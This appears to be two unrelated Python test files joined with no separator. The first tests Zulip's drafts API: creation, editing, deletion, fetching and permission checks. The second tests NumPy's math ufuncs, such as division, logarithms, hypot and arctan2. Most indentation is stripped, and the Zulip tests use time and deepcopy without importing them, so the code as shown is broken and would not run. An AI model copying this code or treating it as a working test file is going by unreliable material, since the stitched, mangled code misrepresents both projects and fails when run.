from typing import Any, Dict, List, Optional
import orjson
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import Draft
class DraftCreationTests(ZulipTestCase):
def create_and_check_drafts_for_success(self, draft_dicts: List[Dict[str, Any]],
expected_draft_dicts: Optional[List[Dict[str, Any]]]=None) -> None:
hamlet = self.example_user("hamlet")
# Make sure that there are no drafts in the database before
# the test begins.
self.assertEqual(Draft.objects.count(), 0)
# Now send a POST request to the API endpoint.
payload = {"drafts": orjson.dumps(draft_dicts).decode()}
resp = self.api_post(hamlet, "/api/v1/drafts", payload)
self.assert_json_success(resp)
# Finally check to make sure that the drafts were actually created properly.
new_draft_dicts = []
for draft in Draft.objects.order_by("last_edit_time"):
draft_dict = draft.to_dict()
draft_dict.pop("id")
new_draft_dicts.append(draft_dict)
if expected_draft_dicts is None:
expected_draft_dicts = draft_dicts
self.assertEqual(new_draft_dicts, expected_draft_dicts)
def create_and_check_drafts_for_error(self, draft_dicts: List[Dict[str, Any]],
expected_message: str) -> None:
hamlet = self.example_user("hamlet")
# Make sure that there are no drafts in the database before
# the test begins.
self.assertEqual(Draft.objects.count(), 0)
# Now send a POST request to the API endpoint.
payload = {"drafts": orjson.dumps(draft_dicts).decode()}
resp = self.api_post(hamlet, "/api/v1/drafts", payload)
self.assert_json_error(resp, expected_message)
# Make sure that there are no drafts in the database at the
# end of the test. Drafts should never be created in error
# conditions.
self.assertEqual(Draft.objects.count(), 0)
def test_create_one_stream_draft_properly(self) -> None:
hamlet = self.example_user("hamlet")
visible_stream_name = self.get_streams(hamlet)[0]
visible_stream_id = self.get_stream_id(visible_stream_name)
draft_dicts = [{
"type": "stream",
"to": [visible_stream_id],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_success(draft_dicts)
def test_create_one_personal_message_draft_properly(self) -> None:
zoe = self.example_user("ZOE")
draft_dicts = [{
"type": "private",
"to": [zoe.id],
"topic": "This topic should be ignored.",
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479019,
}]
expected_draft_dicts = [{
"type": "private",
"to": [zoe.id],
"topic": "", # For private messages the topic should be ignored.
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_success(draft_dicts, expected_draft_dicts)
def test_create_one_group_personal_message_draft_properly(self) -> None:
zoe = self.example_user("ZOE")
othello = self.example_user("othello")
draft_dicts = [{
"type": "private",
"to": [zoe.id, othello.id],
"topic": "This topic should be ignored.",
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479019,
}]
expected_draft_dicts = [{
"type": "private",
"to": [zoe.id, othello.id],
"topic": "", # For private messages the topic should be ignored.
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_success(draft_dicts, expected_draft_dicts)
def test_create_batch_of_drafts_properly(self) -> None:
hamlet = self.example_user("hamlet")
visible_stream_name = self.get_streams(hamlet)[0]
visible_stream_id = self.get_stream_id(visible_stream_name)
zoe = self.example_user("ZOE")
othello = self.example_user("othello")
draft_dicts = [
{
"type": "stream",
"to": [visible_stream_id],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
}, # Stream message draft
{
"type": "private",
"to": [zoe.id],
"topic": "",
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479020,
}, # Private message draft
{
"type": "private",
"to": [zoe.id, othello.id],
"topic": "",
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479021,
}, # Private group message draft
]
self.create_and_check_drafts_for_success(draft_dicts)
def test_missing_timestamps(self) -> None:
""" If a timestamp is not provided for a draft dict then it should be automatically
filled in. """
hamlet = self.example_user("hamlet")
visible_stream_name = self.get_streams(hamlet)[0]
visible_stream_id = self.get_stream_id(visible_stream_name)
draft_dicts = [{
"type": "stream",
"to": [visible_stream_id],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
}]
self.assertEqual(Draft.objects.count(), 0)
current_time = int(time.time())
payload = {"drafts": orjson.dumps(draft_dicts).decode()}
resp = self.api_post(hamlet, "/api/v1/drafts", payload)
self.assert_json_success(resp)
new_drafts = Draft.objects.all()
self.assertEqual(Draft.objects.count(), 1)
new_draft = new_drafts[0].to_dict()
self.assertTrue(isinstance(new_draft["timestamp"], int))
# Since it would be too tricky to get the same times, perform
# a relative check.
self.assertTrue(new_draft["timestamp"] >= current_time)
def test_invalid_timestamp(self) -> None:
draft_dicts = [{
"type": "stream",
"to": [],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": -10.10,
}]
self.create_and_check_drafts_for_error(
draft_dicts,
"Timestamp must not be negative."
)
def test_create_non_stream_draft_with_no_recipient(self) -> None:
""" When "to" is an empty list, the type should become "" as well. """
draft_dicts = [
{
"type": "private",
"to": [],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
},
{
"type": "",
"to": [],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
},
]
expected_draft_dicts = [
{
"type": "",
"to": [],
"topic": "",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
},
{
"type": "",
"to": [],
"topic": "",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
},
]
self.create_and_check_drafts_for_success(draft_dicts, expected_draft_dicts)
def test_create_stream_draft_with_no_recipient(self) -> None:
draft_dicts = [{
"type": "stream",
"to": [],
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 15954790199,
}]
self.create_and_check_drafts_for_error(
draft_dicts,
"Must specify exactly 1 stream ID for stream messages"
)
def test_create_stream_draft_for_inaccessible_stream(self) -> None:
# When the user does not have permission to access the stream:
stream = self.make_stream("Secret Society", invite_only=True)
draft_dicts = [{
"type": "stream",
"to": [stream.id], # This can't be accessed by hamlet.
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_error(draft_dicts, "Invalid stream id")
# When the stream itself does not exist:
draft_dicts = [{
"type": "stream",
"to": [99999999999999], # Hopefully, this doesn't exist.
"topic": "sync drafts",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_error(draft_dicts, "Invalid stream id")
def test_create_personal_message_draft_for_non_existing_user(self) -> None:
draft_dicts = [{
"type": "private",
"to": [99999999999999], # Hopefully, this doesn't exist either.
"topic": "This topic should be ignored.",
"content": "What if we made it possible to sync drafts in Zulip?",
"timestamp": 1595479019,
}]
self.create_and_check_drafts_for_error(draft_dicts, "Invalid user ID 99999999999999")
def test_create_draft_with_null_bytes(self) -> None:
draft_dicts = [{
"type": "",
"to": [],
"topic": "sync drafts.",
"content": "Some regular \x00 content here",
"timestamp": 15954790199,
}]
self.create_and_check_drafts_for_error(
draft_dicts,
"Message must not contain null bytes"
)
draft_dicts = [{
"type": "stream",
"to": [10],
"topic": "thinking about \x00",
"content": "Let's add backend support for syncing drafts.",
"timestamp": 15954790199,
}]
self.create_and_check_drafts_for_error(
draft_dicts,
"Topic must not contain null bytes"
)
class DraftEditTests(ZulipTestCase):
def test_edit_draft_successfully(self) -> None:
hamlet = self.example_user("hamlet")
visible_streams = self.get_streams(hamlet)
stream_a = self.get_stream_id(visible_streams[0])
stream_b = self.get_stream_id(visible_streams[1])
# Make sure that there are no drafts at the start of this test.
self.assertEqual(Draft.objects.count(), 0)
# Create a draft.
draft_dict = {
"type": "stream",
"to": [stream_a],
"topic": "drafts",
"content": "The API should be good",
"timestamp": 1595505700
}
resp = self.api_post(hamlet, "/api/v1/drafts", {"drafts": orjson.dumps([draft_dict]).decode()})
self.assert_json_success(resp)
new_draft_id = orjson.loads(resp.content)["ids"][0]
# Change the draft data.
draft_dict["content"] = "The API needs to be structured yet simple to use."
draft_dict["to"] = [stream_b]
draft_dict["topic"] = "designing drafts"
draft_dict["timestamp"] = 1595505800
# Update this change in the backend.
resp = self.api_patch(hamlet, f"/api/v1/drafts/{new_draft_id}",
{"draft": orjson.dumps(draft_dict).decode()})
self.assert_json_success(resp)
# Now make sure that the change was made successfully.
new_draft = Draft.objects.get(id=new_draft_id, user_profile=hamlet)
new_draft_dict = new_draft.to_dict()
new_draft_dict.pop("id")
self.assertEqual(new_draft_dict, draft_dict)
    def test_edit_non_existent_draft(self) -> None:
hamlet = self.example_user("hamlet")
# Make sure that no draft exists in the first place.
self.assertEqual(Draft.objects.count(), 0)
# Try to update a draft that doesn't exist.
draft_dict = {
"type": "stream",
"to": [10],
"topic": "drafts",
"content": "The API should be good",
"timestamp": 1595505700
}
resp = self.api_patch(hamlet, "/api/v1/drafts/999999999",
{"draft": orjson.dumps(draft_dict).decode()})
self.assert_json_error(resp, "Draft does not exist", status_code=404)
# Now make sure that no changes were made.
self.assertEqual(Draft.objects.count(), 0)
def test_edit_unowned_draft(self) -> None:
hamlet = self.example_user("hamlet")
visible_streams = self.get_streams(hamlet)
stream_id = self.get_stream_id(visible_streams[0])
# Make sure that there are no drafts at the start of this test.
self.assertEqual(Draft.objects.count(), 0)
# Create a draft.
draft_dict = {
"type": "stream",
"to": [stream_id],
"topic": "drafts",
"content": "The API should be good",
"timestamp": 1595505700
}
resp = self.api_post(hamlet, "/api/v1/drafts", {"drafts": orjson.dumps([draft_dict]).decode()})
self.assert_json_success(resp)
new_draft_id = orjson.loads(resp.content)["ids"][0]
# Change the draft data.
modified_draft_dict = deepcopy(draft_dict)
modified_draft_dict["content"] = "???"
# Update this change in the backend as a different user.
zoe = self.example_user("ZOE")
resp = self.api_patch(zoe, f"/api/v1/drafts/{new_draft_id}",
{"draft": orjson.dumps(draft_dict).decode()})
self.assert_json_error(resp, "Draft does not exist", status_code=404)
# Now make sure that no changes were made.
existing_draft = Draft.objects.get(id=new_draft_id, user_profile=hamlet)
existing_draft_dict = existing_draft.to_dict()
existing_draft_dict.pop("id")
self.assertEqual(existing_draft_dict, draft_dict)
class DraftDeleteTests(ZulipTestCase):
def test_delete_draft_successfully(self) -> None:
hamlet = self.example_user("hamlet")
visible_streams = self.get_streams(hamlet)
stream_id = self.get_stream_id(visible_streams[0])
# Make sure that there are no drafts at the start of this test.
self.assertEqual(Draft.objects.count(), 0)
# Create a draft.
draft_dict = {
"type": "stream",
"to": [stream_id],
"topic": "drafts",
"content": "The API should be good",
"timestamp": 1595505700
}
resp = self.api_post(hamlet, "/api/v1/drafts", {"drafts": orjson.dumps([draft_dict]).decode()})
self.assert_json_success(resp)
new_draft_id = orjson.loads(resp.content)["ids"][0]
# Make sure that exactly 1 draft exists now.
self.assertEqual(Draft.objects.count(), 1)
# Update this change in the backend.
resp = self.api_delete(hamlet, f"/api/v1/drafts/{new_draft_id}")
self.assert_json_success(resp)
        # Now make sure that there are no more drafts.
self.assertEqual(Draft.objects.count(), 0)
    def test_delete_non_existent_draft(self) -> None:
hamlet = self.example_user("hamlet")
# Make sure that no draft exists in the first place.
self.assertEqual(Draft.objects.count(), 0)
# Try to delete a draft that doesn't exist.
resp = self.api_delete(hamlet, "/api/v1/drafts/9999999999")
self.assert_json_error(resp, "Draft does not exist", status_code=404)
# Now make sure that no drafts were made for whatever reason.
self.assertEqual(Draft.objects.count(), 0)
def test_delete_unowned_draft(self) -> None:
hamlet = self.example_user("hamlet")
visible_streams = self.get_streams(hamlet)
stream_id = self.get_stream_id(visible_streams[0])
# Make sure that there are no drafts at the start of this test.
self.assertEqual(Draft.objects.count(), 0)
# Create a draft.
draft_dict = {
"type": "stream",
"to": [stream_id],
"topic": "drafts",
"content": "The API should be good",
"timestamp": 1595505700
}
resp = self.api_post(hamlet, "/api/v1/drafts", {"drafts": orjson.dumps([draft_dict]).decode()})
self.assert_json_success(resp)
new_draft_id = orjson.loads(resp.content)["ids"][0]
# Delete this draft in the backend as a different user.
zoe = self.example_user("ZOE")
resp = self.api_delete(zoe, f"/api/v1/drafts/{new_draft_id}")
self.assert_json_error(resp, "Draft does not exist", status_code=404)
# Make sure that the draft was not deleted.
self.assertEqual(Draft.objects.count(), 1)
# Now make sure that no changes were made either.
existing_draft = Draft.objects.get(id=new_draft_id, user_profile=hamlet)
existing_draft_dict = existing_draft.to_dict()
existing_draft_dict.pop("id")
self.assertEqual(existing_draft_dict, draft_dict)
class DraftFetchTest(ZulipTestCase):
def test_fetch_drafts(self) -> None:
self.assertEqual(Draft.objects.count(), 0)
hamlet = self.example_user("hamlet")
zoe = self.example_user("ZOE")
othello = self.example_user("othello")
visible_stream_id = self.get_stream_id(self.get_streams(hamlet)[0])
draft_dicts = [
{
"type": "stream",
"to": [visible_stream_id],
"topic": "thinking out loud",
"content": "What if pigs really could fly?",
"timestamp": 15954790197,
},
{
"type": "private",
"to": [zoe.id, othello.id],
"topic": "",
"content": "What if made it possible to sync drafts in Zulip?",
"timestamp": 15954790198,
},
{
"type": "private",
"to": [zoe.id],
"topic": "",
"content": "What if made it possible to sync drafts in Zulip?",
"timestamp": 15954790199,
},
]
payload = {"drafts": orjson.dumps(draft_dicts).decode()}
resp = self.api_post(hamlet, "/api/v1/drafts", payload)
self.assert_json_success(resp)
self.assertEqual(Draft.objects.count(), 3)
zoe_draft_dicts = [
{
"type": "private",
"to": [hamlet.id],
"topic": "",
"content": "Hello there!",
"timestamp": 15954790200,
},
]
payload = {"drafts": orjson.dumps(zoe_draft_dicts).decode()}
resp = self.api_post(zoe, "/api/v1/drafts", payload)
self.assert_json_success(resp)
self.assertEqual(Draft.objects.count(), 4)
# Now actually fetch the drafts. Make sure that hamlet gets only
# his drafts and exactly as he made them.
resp = self.api_get(hamlet, "/api/v1/drafts")
self.assert_json_success(resp)
data = orjson.loads(resp.content)
self.assertEqual(data["count"], 3)
first_draft_id = Draft.objects.order_by("id")[0].id
expected_draft_contents = [
{
"id": first_draft_id + i,
**draft_dicts[i]
} for i in range(0, 3)
]
self.assertEqual(data["drafts"], expected_draft_contents)
|
|
import sys
import platform
from numpy.testing import *
import numpy.core.umath as ncu
import numpy as np
class TestDivision(TestCase):
def test_division_int(self):
# int division should follow Python
x = np.array([5, 10, 90, 100, -5, -10, -90, -100, -120])
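        # Under true division (Python 3, or "from __future__ import division"),
        # 5 / 10 == 0.5; under classic Python 2 integer division it is 0.  The
        # branch below expects numpy's integer '/' to match the interpreter.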
if 5 / 10 == 0.5:
assert_equal(x / 100, [0.05, 0.1, 0.9, 1,
-0.05, -0.1, -0.9, -1, -1.2])
else:
assert_equal(x / 100, [0, 0, 0, 1, -1, -1, -1, -1, -2])
assert_equal(x // 100, [0, 0, 0, 1, -1, -1, -1, -1, -2])
assert_equal(x % 100, [5, 10, 90, 0, 95, 90, 10, 0, 80])
def test_division_complex(self):
# check that implementation is correct
msg = "Complex division implementation check"
x = np.array([1. + 1.*1j, 1. + .5*1j, 1. + 2.*1j], dtype=np.complex128)
assert_almost_equal(x**2/x, x, err_msg=msg)
# check overflow, underflow
msg = "Complex division overflow/underflow check"
x = np.array([1.e+110, 1.e-110], dtype=np.complex128)
y = x**2/x
assert_almost_equal(y/x, [1, 1], err_msg=msg)
def test_floor_division_complex(self):
# check that implementation is correct
msg = "Complex floor division implementation check"
x = np.array([.9 + 1j, -.1 + 1j, .9 + .5*1j, .9 + 2.*1j], dtype=np.complex128)
y = np.array([0., -1., 0., 0.], dtype=np.complex128)
assert_equal(np.floor_divide(x**2,x), y, err_msg=msg)
# check overflow, underflow
msg = "Complex floor division overflow/underflow check"
x = np.array([1.e+110, 1.e-110], dtype=np.complex128)
y = np.floor_divide(x**2, x)
assert_equal(y, [1.e+110, 0], err_msg=msg)
class TestPower(TestCase):
def test_power_float(self):
x = np.array([1., 2., 3.])
assert_equal(x**0, [1., 1., 1.])
assert_equal(x**1, x)
assert_equal(x**2, [1., 4., 9.])
y = x.copy()
y **= 2
assert_equal(y, [1., 4., 9.])
assert_almost_equal(x**(-1), [1., 0.5, 1./3])
assert_almost_equal(x**(0.5), [1., ncu.sqrt(2), ncu.sqrt(3)])
def test_power_complex(self):
x = np.array([1+2j, 2+3j, 3+4j])
assert_equal(x**0, [1., 1., 1.])
assert_equal(x**1, x)
assert_almost_equal(x**2, [-3+4j, -5+12j, -7+24j])
assert_almost_equal(x**3, [(1+2j)**3, (2+3j)**3, (3+4j)**3])
assert_almost_equal(x**4, [(1+2j)**4, (2+3j)**4, (3+4j)**4])
assert_almost_equal(x**(-1), [1/(1+2j), 1/(2+3j), 1/(3+4j)])
assert_almost_equal(x**(-2), [1/(1+2j)**2, 1/(2+3j)**2, 1/(3+4j)**2])
assert_almost_equal(x**(-3), [(-11+2j)/125, (-46-9j)/2197,
(-117-44j)/15625])
assert_almost_equal(x**(0.5), [ncu.sqrt(1+2j), ncu.sqrt(2+3j),
ncu.sqrt(3+4j)])
norm = 1./((x**14)[0])
assert_almost_equal(x**14 * norm,
[i * norm for i in [-76443+16124j, 23161315+58317492j,
5583548873 + 2465133864j]])
# Ticket #836
def assert_complex_equal(x, y):
assert_array_equal(x.real, y.real)
assert_array_equal(x.imag, y.imag)
for z in [complex(0, np.inf), complex(1, np.inf)]:
err = np.seterr(invalid="ignore")
z = np.array([z], dtype=np.complex_)
try:
assert_complex_equal(z**1, z)
assert_complex_equal(z**2, z*z)
assert_complex_equal(z**3, z*z*z)
finally:
np.seterr(**err)
def test_power_zero(self):
# ticket #1271
zero = np.array([0j])
one = np.array([1+0j])
cinf = np.array([complex(np.inf, 0)])
cnan = np.array([complex(np.nan, np.nan)])
def assert_complex_equal(x, y):
x, y = np.asarray(x), np.asarray(y)
assert_array_equal(x.real, y.real)
assert_array_equal(x.imag, y.imag)
# positive powers
for p in [0.33, 0.5, 1, 1.5, 2, 3, 4, 5, 6.6]:
assert_complex_equal(np.power(zero, p), zero)
# zero power
assert_complex_equal(np.power(zero, 0), one)
assert_complex_equal(np.power(zero, 0+1j), cnan)
# negative power
for p in [0.33, 0.5, 1, 1.5, 2, 3, 4, 5, 6.6]:
assert_complex_equal(np.power(zero, -p), cnan)
assert_complex_equal(np.power(zero, -1+0.2j), cnan)
class TestLog2(TestCase):
def test_log2_values(self) :
x = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for dt in ['f','d','g'] :
xf = np.array(x, dtype=dt)
yf = np.array(y, dtype=dt)
assert_almost_equal(np.log2(xf), yf)
class TestExp2(TestCase):
def test_exp2_values(self) :
x = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for dt in ['f','d','g'] :
xf = np.array(x, dtype=dt)
yf = np.array(y, dtype=dt)
assert_almost_equal(np.exp2(yf), xf)
class TestLogAddExp2(object):
# Need test for intermediate precisions
def test_logaddexp2_values(self) :
x = [1, 2, 3, 4, 5]
y = [5, 4, 3, 2, 1]
z = [6, 6, 6, 6, 6]
for dt, dec in zip(['f','d','g'],[6, 15, 15]) :
xf = np.log2(np.array(x, dtype=dt))
yf = np.log2(np.array(y, dtype=dt))
zf = np.log2(np.array(z, dtype=dt))
assert_almost_equal(np.logaddexp2(xf, yf), zf, decimal=dec)
def test_logaddexp2_range(self) :
x = [1000000, -1000000, 1000200, -1000200]
y = [1000200, -1000200, 1000000, -1000000]
z = [1000200, -1000000, 1000200, -1000000]
for dt in ['f','d','g'] :
logxf = np.array(x, dtype=dt)
logyf = np.array(y, dtype=dt)
logzf = np.array(z, dtype=dt)
assert_almost_equal(np.logaddexp2(logxf, logyf), logzf)
def test_inf(self) :
err = np.seterr(invalid='ignore')
inf = np.inf
x = [inf, -inf, inf, -inf, inf, 1, -inf, 1]
y = [inf, inf, -inf, -inf, 1, inf, 1, -inf]
z = [inf, inf, inf, -inf, inf, inf, 1, 1]
try:
for dt in ['f','d','g'] :
logxf = np.array(x, dtype=dt)
logyf = np.array(y, dtype=dt)
logzf = np.array(z, dtype=dt)
assert_equal(np.logaddexp2(logxf, logyf), logzf)
finally:
np.seterr(**err)
def test_nan(self):
assert np.isnan(np.logaddexp2(np.nan, np.inf))
assert np.isnan(np.logaddexp2(np.inf, np.nan))
assert np.isnan(np.logaddexp2(np.nan, 0))
assert np.isnan(np.logaddexp2(0, np.nan))
assert np.isnan(np.logaddexp2(np.nan, np.nan))
class TestLog(TestCase):
def test_log_values(self) :
x = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for dt in ['f','d','g'] :
log2_ = 0.69314718055994530943
xf = np.array(x, dtype=dt)
yf = np.array(y, dtype=dt)*log2_
assert_almost_equal(np.log(xf), yf)
class TestExp(TestCase):
def test_exp_values(self) :
x = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for dt in ['f','d','g'] :
log2_ = 0.69314718055994530943
xf = np.array(x, dtype=dt)
yf = np.array(y, dtype=dt)*log2_
assert_almost_equal(np.exp(yf), xf)
class TestLogAddExp(object):
def test_logaddexp_values(self) :
x = [1, 2, 3, 4, 5]
y = [5, 4, 3, 2, 1]
z = [6, 6, 6, 6, 6]
for dt, dec in zip(['f','d','g'],[6, 15, 15]) :
xf = np.log(np.array(x, dtype=dt))
yf = np.log(np.array(y, dtype=dt))
zf = np.log(np.array(z, dtype=dt))
assert_almost_equal(np.logaddexp(xf, yf), zf, decimal=dec)
def test_logaddexp_range(self) :
x = [1000000, -1000000, 1000200, -1000200]
y = [1000200, -1000200, 1000000, -1000000]
z = [1000200, -1000000, 1000200, -1000000]
for dt in ['f','d','g'] :
logxf = np.array(x, dtype=dt)
logyf = np.array(y, dtype=dt)
logzf = np.array(z, dtype=dt)
assert_almost_equal(np.logaddexp(logxf, logyf), logzf)
def test_inf(self) :
err = np.seterr(invalid='ignore')
inf = np.inf
x = [inf, -inf, inf, -inf, inf, 1, -inf, 1]
y = [inf, inf, -inf, -inf, 1, inf, 1, -inf]
z = [inf, inf, inf, -inf, inf, inf, 1, 1]
try:
for dt in ['f','d','g'] :
logxf = np.array(x, dtype=dt)
logyf = np.array(y, dtype=dt)
logzf = np.array(z, dtype=dt)
assert_equal(np.logaddexp(logxf, logyf), logzf)
finally:
np.seterr(**err)
def test_nan(self):
assert np.isnan(np.logaddexp(np.nan, np.inf))
assert np.isnan(np.logaddexp(np.inf, np.nan))
assert np.isnan(np.logaddexp(np.nan, 0))
assert np.isnan(np.logaddexp(0, np.nan))
assert np.isnan(np.logaddexp(np.nan, np.nan))
class TestLog1p(TestCase):
def test_log1p(self):
assert_almost_equal(ncu.log1p(0.2), ncu.log(1.2))
assert_almost_equal(ncu.log1p(1e-6), ncu.log(1+1e-6))
class TestExpm1(TestCase):
def test_expm1(self):
assert_almost_equal(ncu.expm1(0.2), ncu.exp(0.2)-1)
assert_almost_equal(ncu.expm1(1e-6), ncu.exp(1e-6)-1)
class TestHypot(TestCase, object):
def test_simple(self):
assert_almost_equal(ncu.hypot(1, 1), ncu.sqrt(2))
assert_almost_equal(ncu.hypot(0, 0), 0)
def assert_hypot_isnan(x, y):
err = np.seterr(invalid='ignore')
try:
assert np.isnan(ncu.hypot(x, y)), "hypot(%s, %s) is %s, not nan" % (x, y, ncu.hypot(x, y))
finally:
np.seterr(**err)
def assert_hypot_isinf(x, y):
err = np.seterr(invalid='ignore')
try:
assert np.isinf(ncu.hypot(x, y)), "hypot(%s, %s) is %s, not inf" % (x, y, ncu.hypot(x, y))
finally:
np.seterr(**err)
class TestHypotSpecialValues(TestCase):
def test_nan_outputs(self):
assert_hypot_isnan(np.nan, np.nan)
assert_hypot_isnan(np.nan, 1)
    def test_nan_outputs2(self):
assert_hypot_isinf(np.nan, np.inf)
assert_hypot_isinf(np.inf, np.nan)
assert_hypot_isinf(np.inf, 0)
assert_hypot_isinf(0, np.inf)
def assert_arctan2_isnan(x, y):
assert np.isnan(ncu.arctan2(x, y)), "arctan(%s, %s) is %s, not nan" % (x, y, ncu.arctan2(x, y))
def assert_arctan2_ispinf(x, y):
assert (np.isinf(ncu.arctan2(x, y)) and ncu.arctan2(x, y) > 0), "arctan(%s, %s) is %s, not +inf" % (x, y, ncu.arctan2(x, y))
def assert_arctan2_isninf(x, y):
assert (np.isinf(ncu.arctan2(x, y)) and ncu.arctan2(x, y) < 0), "arctan(%s, %s) is %s, not -inf" % (x, y, ncu.arctan2(x, y))
def assert_arctan2_ispzero(x, y):
assert (ncu.arctan2(x, y) == 0 and not np.signbit(ncu.arctan2(x, y))), "arctan(%s, %s) is %s, not +0" % (x, y, ncu.arctan2(x, y))
def assert_arctan2_isnzero(x, y):
assert (ncu.arctan2(x, y) == 0 and np.signbit(ncu.arctan2(x, y))), "arctan(%s, %s) is %s, not -0" % (x, y, ncu.arctan2(x, y))
class TestArctan2SpecialValues(TestCase):
def test_one_one(self):
# atan2(1, 1) returns pi/4.
assert_almost_equal(ncu.arctan2(1, 1), 0.25 * np.pi)
assert_almost_equal(ncu.arctan2(-1, 1), -0.25 * np.pi)
assert_almost_equal(ncu.arctan2(1, -1), 0.75 * np.pi)
def test_zero_nzero(self):
# atan2(+-0, -0) returns +-pi.
assert_almost_equal(ncu.arctan2(np.PZERO, np.NZERO), np.pi)
assert_almost_equal(ncu.arctan2(np.NZERO, np.NZERO), -np.pi)
def test_zero_pzero(self):
# atan2(+-0, +0) returns +-0.
assert_arctan2_ispzero(np.PZERO, np.PZERO)
assert_arctan2_isnzero(np.NZERO, np.PZERO)
def test_zero_negative(self):
# atan2(+-0, x) returns +-pi for x < 0.
assert_almost_equal(ncu.arctan2(np.PZERO, -1), np.pi)
assert_almost_equal(ncu.arctan2(np.NZERO, -1), -np.pi)
def test_zero_positive(self):
# atan2(+-0, x) returns +-0 for x > 0.
assert_arctan2_ispzero(np.PZERO, 1)
assert_arctan2_isnzero(np.NZERO, 1)
def test_positive_zero(self):
# atan2(y, +-0) returns +pi/2 for y > 0.
assert_almost_equal(ncu.arctan2(1, np.PZERO), 0.5 * np.pi)
assert_almost_equal(ncu.arctan2(1, np.NZERO), 0.5 * np.pi)
def test_negative_zero(self):
# atan2(y, +-0) returns -pi/2 for y < 0.
assert_almost_equal(ncu.arctan2(-1, np.PZERO), -0.5 * np.pi)
assert_almost_equal(ncu.arctan2(-1, np.NZERO), -0.5 * np.pi)
def test_any_ninf(self):
# atan2(+-y, -infinity) returns +-pi for finite y > 0.
assert_almost_equal(ncu.arctan2(1, np.NINF), np.pi)
assert_almost_equal(ncu.arctan2(-1, np.NINF), -np.pi)
def test_any_pinf(self):
# atan2(+-y, +infinity) returns +-0 for finite y > 0.
assert_arctan2_ispzero(1, np.inf)
assert_arctan2_isnzero(-1, np.inf)
def test_inf_any(self):
# atan2(+-infinity, x) returns +-pi/2 for finite x.
assert_almost_equal(ncu.arctan2( np.inf, 1), 0.5 * np.pi)
assert_almost_equal(ncu.arctan2(-np.inf, 1), -0.5 * np.pi)
def test_inf_ninf(self):
# atan2(+-infinity, -infinity) returns +-3*pi/4.
assert_almost_equal(ncu.arctan2( np.inf, -np.inf), 0.75 * np.pi)
assert_almost_equal(ncu.arctan2(-np.inf, -np.inf), -0.75 * np.pi)
def test_inf_pinf(self):
# atan2(+-infinity, +infinity) returns +-pi/4.
assert_almost_equal(ncu.arctan2( np.inf, np.inf), 0.25 * np.pi)
assert_almost_equal(ncu.arctan2(-np.inf, np.inf), -0.25 * np.pi)
def test_nan_any(self):
# atan2(nan, x) returns nan for any x, including inf
assert_arctan2_isnan(np.nan, np.inf)
assert_arctan2_isnan(np.inf, np.nan)
assert_arctan2_isnan(np.nan, np.nan)
class TestLdexp(TestCase):
def _check_ldexp(self, tp):
assert_almost_equal(ncu.ldexp(np.array(2., np.float32),
np.array(3, tp)), 16.)
assert_almost_equal(ncu.ldexp(np.array(2., np.float64),
np.array(3, tp)), 16.)
assert_almost_equal(ncu.ldexp(np.array(2., np.longdouble),
np.array(3, tp)), 16.)
def test_ldexp(self):
# The default Python int type should work
assert_almost_equal(ncu.ldexp(2., 3), 16.)
# The following int types should all be accepted
self._check_ldexp(np.int8)
self._check_ldexp(np.int16)
self._check_ldexp(np.int32)
self._check_ldexp('i')
self._check_ldexp('l')
@dec.knownfailureif(sys.platform == 'win32' and sys.version_info < (2, 6),
"python.org < 2.6 binaries have broken ldexp in the "
"C runtime")
def test_ldexp_overflow(self):
# silence warning emitted on overflow
err = np.seterr(over="ignore")
try:
imax = np.iinfo(np.dtype('l')).max
imin = np.iinfo(np.dtype('l')).min
assert_equal(ncu.ldexp(2., imax), np.inf)
assert_equal(ncu.ldexp(2., imin), 0)
finally:
np.seterr(**err)
class TestMaximum(TestCase):
def test_reduce(self):
dflt = np.typecodes['AllFloat']
dint = np.typecodes['AllInteger']
seq1 = np.arange(11)
seq2 = seq1[::-1]
func = np.maximum.reduce
for dt in dint:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 10)
assert_equal(func(tmp2), 10)
for dt in dflt:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 10)
assert_equal(func(tmp2), 10)
tmp1[::2] = np.nan
tmp2[::2] = np.nan
assert_equal(func(tmp1), np.nan)
assert_equal(func(tmp2), np.nan)
def test_reduce_complex(self):
assert_equal(np.maximum.reduce([1,2j]),1)
assert_equal(np.maximum.reduce([1+3j,2j]),1+3j)
def test_float_nans(self):
nan = np.nan
arg1 = np.array([0, nan, nan])
arg2 = np.array([nan, 0, nan])
out = np.array([nan, nan, nan])
assert_equal(np.maximum(arg1, arg2), out)
